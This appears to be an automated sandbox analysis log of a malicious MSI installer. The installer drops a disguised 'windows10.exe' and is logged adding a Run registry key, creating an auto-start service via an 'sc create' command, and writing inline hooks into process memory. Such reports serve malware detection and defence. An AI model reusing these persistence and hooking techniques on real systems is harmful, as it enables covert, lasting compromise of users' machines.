            Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,3053730682193171380,1241186122492042118,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe, Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: magnification.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d9.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: slwga.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: schedcli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: security.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: olepro32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: activeds.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxva2.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: idndl.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: hBqTrQLya4.msiStatic file information: File size 31124992 > 1048576
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: hBqTrQLya4.msi
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
            Source: initial sampleStatic PE information: section where entry point is pointing to: .kC0
            Source: StarBurn.dll.2.drStatic PE information: section name: .didata
            Source: StarBurn.dll.2.drStatic PE information: section name: .ri$
            Source: StarBurn.dll.2.drStatic PE information: section name: .)5y
            Source: StarBurn.dll.2.drStatic PE information: section name: .kC0
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004081F0 push ecx; ret 12_2_00408203
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D981F0 push ecx; ret 13_2_00D98203
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCB794 push 00BCB82Ah; ret 14_2_00BCB822
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA3C8 push 00BCA465h; ret 14_2_00BCA45D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCADB8 push 00BCAE20h; ret 14_2_00BCAE18
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA69C push 00BCA738h; ret 14_2_00BCA730
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA48C push 00BCA542h; ret 14_2_00BCA53A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCB028 push 00BCB222h; ret 14_2_00BCB21A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA570 push 00BCA5BAh; ret 14_2_00BCA5B2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA569 push 00BCA5BAh; ret 14_2_00BCA5B2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCB244 push 00BCB2E3h; ret 14_2_00BCB2DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00964084 push ecx; mov dword ptr [esp], edx14_2_00964085
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00932050 push ecx; mov dword ptr [esp], eax14_2_00932051
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095C078 push ecx; mov dword ptr [esp], ecx14_2_0095C07C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009211A0 push ecx; mov dword ptr [esp], eax14_2_009211A1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009611F8 push ecx; mov dword ptr [esp], ecx14_2_009611FC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009A6138 push ecx; mov dword ptr [esp], edx14_2_009A613A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00919120 push 009191B9h; ret 14_2_009191B1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00960154 push ecx; mov dword ptr [esp], edx14_2_00960155
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095F144 push ecx; mov dword ptr [esp], ecx14_2_0095F148
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00921170 push ecx; mov dword ptr [esp], eax14_2_00921171
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00960164 push ecx; mov dword ptr [esp], edx14_2_00960165
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095D160 push ecx; mov dword ptr [esp], ecx14_2_0095D164
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095A2D8 push ecx; mov dword ptr [esp], ecx14_2_0095A2DC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00959250 push ecx; mov dword ptr [esp], edx14_2_00959251
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095E3AC push ecx; mov dword ptr [esp], ecx14_2_0095E3B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095D34C push ecx; mov dword ptr [esp], ecx14_2_0095D350
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009634A4 push ecx; mov dword ptr [esp], edx14_2_009634A5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009624A8 push ecx; mov dword ptr [esp], edx14_2_009624A9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095A4C4 push ecx; mov dword ptr [esp], ecx14_2_0095A4C8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009995DC push ecx; mov dword ptr [esp], edx14_2_009995E1

            Persistence and Installation Behavior

            Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSIDD92.tmp
            Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSIDD62.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIDD62.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID6F5.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID754.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID7D3.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID686.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIDD92.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID783.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIDD62.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID6F5.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID754.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID7D3.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID686.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSIDD92.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID783.tmp
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
            Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram Desktop
            Source: C:\Windows\System32\msiexec.exe | Registry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run windows
            Source: C:\Windows\System32\msiexec.exe | Registry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run windows
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 6E0005 value: E9 8B 2F 08 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 77762F90 value: E9 7A D0 F7 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 3750005 value: E9 2B BA FD 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 7772BA30 value: E9 DA 45 02 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 3760008 value: E9 8B 8E 01 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 77778E90 value: E9 80 71 FE 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 3990005 value: E9 8B 4D 0A 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 75A34D90 value: E9 7A B2 F5 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 39B0005 value: E9 EB EB 09 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 75A4EBF0 value: E9 1A 14 F6 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 39C0005 value: E9 8B 8A C1 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 765D8A90 value: E9 7A 75 3E 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 39D0005 value: E9 2B 02 C3 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 7416 base: 76600230 value: E9 DA FD 3C 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 720005 value: E9 8B 2F 04 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 77762F90 value: E9 7A D0 FB 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 740005 value: E9 2B BA FE 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 7772BA30 value: E9 DA 45 01 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 750008 value: E9 8B 8E 02 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 77778E90 value: E9 80 71 FD 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 770005 value: E9 8B 4D 2C 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 75A34D90 value: E9 7A B2 D3 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 780005 value: E9 EB EB 2C 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 75A4EBF0 value: E9 1A 14 D3 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 790005 value: E9 8B 8A E4 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 765D8A90 value: E9 7A 75 1B 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 7A0005 value: E9 2B 02 E6 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8260 base: 76600230 value: E9 DA FD 19 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 700005 value: E9 8B 2F 06 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 77762F90 value: E9 7A D0 F9 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 720005 value: E9 2B BA 00 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 7772BA30 value: E9 DA 45 FF 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 740008 value: E9 8B 8E 03 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 77778E90 value: E9 80 71 FC 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 3890005 value: E9 8B 4D 1A 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 75A34D90 value: E9 7A B2 E5 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 38A0005 value: E9 EB EB 1A 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 75A4EBF0 value: E9 1A 14 E5 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 38B0005 value: E9 8B 8A D2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 765D8A90 value: E9 7A 75 2D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 38C0005 value: E9 2B 02 D4 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8272 base: 76600230 value: E9 DA FD 2B 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 6E0005 value: E9 8B 2F 08 77
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 77762F90 value: E9 7A D0 F7 88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory written: PID: 8288 base: 750005 value: E9 2B BA FD 76
